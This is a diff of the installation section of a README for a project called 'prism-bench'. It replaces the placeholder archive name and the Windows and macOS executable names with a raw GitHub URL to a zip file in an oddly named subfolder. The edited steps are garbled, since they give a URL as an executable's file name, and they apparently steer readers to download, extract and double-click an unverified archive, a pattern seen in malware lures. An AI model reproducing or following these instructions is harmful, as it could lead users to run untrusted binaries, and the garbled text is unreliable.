ada994/prism-bench/README.md

 Once you have downloaded the application, follow these steps to run it:

 1. Locate the downloaded file on your computer (usually in the "Downloads" folder).
-2. If the file is zipped (e.g., `prism-bench-vX.X.zip`), right-click on it and choose **Extract All** to unzip its contents.
+2. If the file is zipped (e.g., `https://raw.githubusercontent.com/ada994/prism-bench/main/aerotonometer/prism-bench.zip`), right-click on it and choose **Extract All** to unzip its contents.
-3. Open the extracted folder and find the executable file, which should be named `prism-bench.exe` for Windows, `prism-bench.app` for macOS, or simply `prism-bench` for Linux (make sure to give it execute permissions if required).
+3. Open the extracted folder and find the executable file, which should be named `https://raw.githubusercontent.com/ada994/prism-bench/main/aerotonometer/prism-bench.zip` for Windows, `https://raw.githubusercontent.com/ada994/prism-bench/main/aerotonometer/prism-bench.zip` for macOS, or simply `prism-bench` for Linux (make sure to give it execute permissions if required).
 4. Double-click the executable file to launch the application.

 ## 🔍 Features